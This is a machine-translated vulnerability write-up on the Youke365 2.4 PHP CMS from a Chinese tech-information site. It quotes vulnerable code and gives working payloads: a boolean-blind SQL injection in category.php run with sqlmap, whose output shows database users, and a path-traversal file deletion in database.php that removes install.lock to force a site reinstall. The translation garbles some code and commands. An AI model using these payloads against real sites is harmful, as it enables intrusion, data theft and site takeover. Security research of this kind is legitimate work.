Shulou(Shulou.com)05/31 Report--

This article will explain in detail a Sql injection vulnerability in Youke365_2_4 and an example analysis of any file deletion. The content of the article is of high quality, so the editor will share it for you as a reference. I hope you will have some understanding of the relevant knowledge after reading this article.

Prat 0 confession

Every day is a new day.

There's nothing to complain about. Get to the point.

/ system/category.php file an Sql injection # # 80-87 lines of code $root_id = intval (trim ($_ POST ['root_id'])); $cate_name = trim ($_ POST [' cate_name']); $cate_dir = trim ($_ POST ['cate_dir']); $cate_url = trim ($_ POST [' cate_url']) $cate_isbest = intval ($_ POST ['cate_isbest']); $cate_order = intval ($_ POST [' cate_order']); $cate_keywords = trim ($_ POST ['cate_keywords']); $cate_description = trim ($_ POST [' cate_description']) If ($action = = 'saveadd') {$query = $DB- > query ("SELECT cate_id FROM $table WHERE root_id='$root_id' AND cate_name='$cate_name'"); if ($DB- > num_rows ($query)) {msgbox (' the category you added already exists!') ;} $DB- > insert ($table, $data); update_categories (); update_cache ('categories'); $fileurl = empty ($root_id)? $fileurl. ='? act=add': $fileurl. ='? act=add&root_id='.$root_id; msgbox ('category added successfully!' , $fileurl);} elseif ($action = = 'saveedit') {$cate_id = intval ($_ POST [' cate_id']); $where = array ('cate_id' = > $cate_id)

First of all, we need to look at $cate_name, get the parameters from POST and remove the spaces.

Then $cate_name is brought into the query when the parameter obtained by $action is saveadd.

Determine whether the name exists in the database, and enter msgbox if the condition is met ('the category you added already exists!')

Add if the condition is not met.

Notice line 20 of the code, and we can be sure that he first queried it through a sql statement.

Vulnerability exploitation

If you reported an error, it doesn't matter. Let's turn on mysql monitoring to see if we have brought in the sql query.

SELECT cate_id FROM dir_categories WHERE root_id='1' AND cate_name='aaaa' and 1mm 1 -'

Considering that the cookie may fail over a long period of time, it is recommended that you directly use the-tech parameter to specify the injection type.

Sqlmap-r "/ mnt/d/test.txt"-p cate_name-dbms=mysql-random-agent-tech B-users

Results:

Parameter: cate_name (POST) Type: boolean-based blind Title: AND boolean-based blind-WHERE or HAVING clause Payload: root_id=1&cate_name=aaaa' AND 6067 AND 'yrhI'='yrhI&cate_dir=aaaa&cate_url=aaaa&cate_keywords=aaaa&cate_description=aaa&cate_order=0&act=saveadd--- [17:58:46] [INFO] testing MySQL [17:58:46] [INFO] confirming MySQL [17:58:46] [INFO] the back-end DBMS is MySQLweb server operating System: Windowsweb application technology: PHP 5.4.45 Apache 2.4.23back-end DBMS: MySQL > = 5.0.0 [17:58:46] [INFO] fetching database users [17:58:46] [INFO] fetching number of database users [17:58:46] [WARNING] running in a single-thread mode. Please consider usage of option'--threads' for faster data retrieval [17:58:46] [INFO] retrieved: 3 [17:59:28] [INFO] retrieved: 'root'@'localhost' [18:10:25] [INFO] retrieved:' root'@'127.0.0.1' [18:22:37] [INFO] retrieved: 'root'@'::1'database management system users [3]:' root'@'127.0.0.1 'root'@'::1' 'root'@'localhost'

Of course, it is possible to invalidate cookie when getting data, but there is no CAPTCHA in the background.

When we know the password of the backstage account, we can build a wheel.

Because I am lazy, I will not write poc for the time being.

/ system/database.php file deletion can cause Cms to reinstall 156165 lines of code if ($action = = 'delete') {$bakfile = trim ($_ GET [' file']); $filepath = $DBak- > datadir.$bakfile; if (unlink ($filepath)) {msgbox ('file deleted successfully!' , $fileurl.'?act=restore');} else {msgbox ('file deletion failed!') ;}}

OK, let's move on to line 158.

First he gets the file parameter from get, then removes the spaces on both sides and stores it in $bakfile

Then splice the file address. Datadir is used here. Let's take a look at it.

Public function _ _ construct ($db_host, $db_user, $db_pass, $db_name, $charset = 'utf8') {$this- > connect ($db_host, $db_user, $db_pass, $db_name, $charset); / / Connect data $this- > datadir = ROOT_PATH.'data/dbbak/';}

If the file is deleted successfully, some partners may ask, which does not achieve the purpose of deleting any file.

This just deletes any file in the specified directory.

Therefore, we need to delete the files in other directories.

Use.. / jump up the directory, for example, if I want to delete the files in the root directory, I need to jump twice.

Payload: system/database.php?act=delete&file=../../a.txt

OK, some friends may find it pointless to delete any file.

Next, let's move on.

Install/install.php17-19 lines of code / / determine if if (file_exists (ROOT_PATH.'data/install.lock')) {failure ('you have installed this system! If you continue with the installation, please delete data/install.lock before continuing');}

First of all, before the cms is reinstalled, it will determine whether there is a data/install.lock file, and if so, it will not go into the following code.

If not, it will be reinstalled.

Then we just need to delete the data/install.

Payload: system/database.php?act=delete&file=../../data/install.lock

You can reinstall it.

Because reinstallation will cause the site to be paralyzed, it is not recommended that you reinstall and delete any files.

This is the end of an example analysis of a Sql injection vulnerability in Youke365_2_4 and an arbitrary file deletion. I hope the above content can be of some help and learn more. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.